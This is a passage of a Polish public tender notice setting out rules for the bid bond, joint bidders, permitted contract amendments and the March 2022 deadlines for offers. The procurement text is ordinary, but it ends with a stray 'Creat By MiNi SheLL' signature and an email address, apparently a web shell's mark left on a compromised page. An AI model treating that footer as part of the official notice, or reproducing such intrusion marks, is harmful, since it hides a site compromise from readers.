pieniądzu,<br/>b) gwarancjach bankowych,<br/>c) gwarancjach ubezpieczeniowych,<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz. U. z 2020 r. poz. 299).<br/>3) Wadium wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego: 85 8499 0008 0400<br/>0534 2000 0003, z dopiskiem: „Wadium w postępowaniu przetargowym nr: IRO.271.2.4.2022.PK. Za termin wniesienia<br/>wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty przez dwa lub więcej<br/>podmiotów, np. konsorcjum, spółkę cywilną).<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy to spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedłożą wraz z ofertą stosowne pełnomocnictwo. Nie<br/>dotyczy to spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej, może wynikać albo z dokumentu pod taką samą nazwą albo z umowy<br/>podmiotów wspólnie składających ofertę.<br/>4) Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia.<br/>5) W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie, o którym mowa w<br/>art. 125 ust. 1 ustawy PZP składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia<br/>te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia (żaden z Wykonawców<br/>wspólnie składających ofertę nie może podlegać wykluczeniu z postępowania, co oznacza, iż oświadczenie w tym zakresie<br/>musi złożyć każdy z Wykonawców składających ofertę wspólną; oświadczenie o spełnianiu warunków udziału składa<br/>podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie) – zał. nr 11 do SWZ.<br/>6) W odniesieniu do warunków dotyczących posiadania zdolności technicznej lub zawodowej, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonują roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonują poszczególni Wykonawcy.<br/>7) Dopuszcza się, aby wadium było wniesione przez pełnomocnika lub jeden z podmiotów wspólnie ubiegających się o<br/>udzielenie zamówienia, przy czym jeżeli wadium zostanie wniesione w formie innej niż pieniądz, z treści dokumentu wadium<br/>musi wynikać, iż zabezpiecza ono ofertę złożoną przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>8) Wszelka korespondencja dokonywana będzie wyłącznie w pełnomocnikiem Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w przypadkach określonych w art. 455 ust. 1 ustawy PZP, tj. w<br/>razie:<br/>a) zmiany terminu wykonania umowy, w sytuacji wystąpienia okoliczności, których nie można było przewidzieć w chwili jej<br/>zawarcia, o czas występowania tych okoliczności, tj.:<br/>− wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć i jemu<br/>zapobiec, uniemożliwiającego lub poważnie utrudniającego wykonanie umowy w ustalonym terminie (siła wyższa), w<br/>szczególności: wojny, epidemii, powodzi, blokady komunikacyjnej o charakterze ponadregionalnym, kataklizmu społecznego<br/>– zmiana terminu wykonania umowy może nastąpić o łączny czas występowania siły wyższej (czas jest liczony w dniach);<br/>− wystąpienia robót dodatkowych i/lub zamiennych w trakcie realizacji robót będących przedmiotem umowy lub<br/>zmniejszenia zakresu robót będących przedmiotem umowy – zmiana terminu wykonania umowy może nastąpić o łączny<br/>czas na wykonanie robót dodatkowych i/lub zamiennych;<br/>− wniesienie odwołania na czynność Zamawiającego związaną z postępowaniem przetargowym – zmiana terminu wykonania umowy może nastąpić o łączny czas wydłużenia postępowania przetargowego (czas jest liczony w dniach);<br/>− wydłużenia terminu związania ofertą w postępowaniu przetargowym, które wpłynęło na późniejsze zawarcie z wykonawcą<br/>umowy (o czas liczony od końca dnia ustawowego terminu związania ofertą wykonawcy do dnia podpisania umowy);<br/>(Zamawiający i wykonawca ustalają nowe terminy umowne, z tym, że wielkość tych zmian musi być powiązana z przyczyną<br/>jaka ją spowodowała);<br/>b) zmiany sposobu wykonania lub zakresu przedmiotu umowy o nie więcej niż 50% w stosunku do pierwotnej wartości<br/>przedmiotu umowy, w przypadku konieczności zwiększenia ilości i zakresu usług objętych zamówieniem wynikających z<br/>potrzeb Zamawiającego, jeśli jest to niezbędne do zgodnej z umową realizacji usług i osiągnięcie zamierzonego celu<br/>Zamawiającego, co może skutkować zmianą wynagrodzenia należnego Wykonawcy, jeśli zmiana ilości i zakresu usług<br/>będzie miała wpływ na zwiększenie tego wynagrodzenia; wówczas wynagrodzenie oblicza się przy zachowaniu<br/>zaoferowanych przez Wykonawcę w ofercie cen jednostkowych;<br/>c) zmiany wysokości wynagrodzenia wykonawcy w przypadku zmiany stawki podatku od towarów i usług – wartość netto<br/>wynagrodzenia wykonawcy (tj. bez podatku od towarów i usług) nie zmieni się, a określona w aneksie wartość brutto<br/>wynagrodzenia zostanie wyliczona z uwzględnieniem stawki podatku od towarów i usług, wynikającej ze zmienionych<br/>przepisów;<br/>d) zmiany kluczowego personelu Zamawiającego lub Wykonawcy, w tym zmiana kierownika budowy/ robót – z uwagi na<br/>nieprzewidziane zmiany organizacyjne. Zmiana ta może nastąpić na inną osobę, która spełnia wymagania zawarte w SWZ<br/>po uzgodnieniu z Zamawiającym. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/, e-PUAP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-10 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) W sprawach nieuregulowanych w SWZ mają zastosowanie przepisy ustawy PZP.<br/>2) Wszystkie załączniki do SWZ stanowią jej integralną część

Creat By MiNi SheLL
Email: jattceo@gmail.com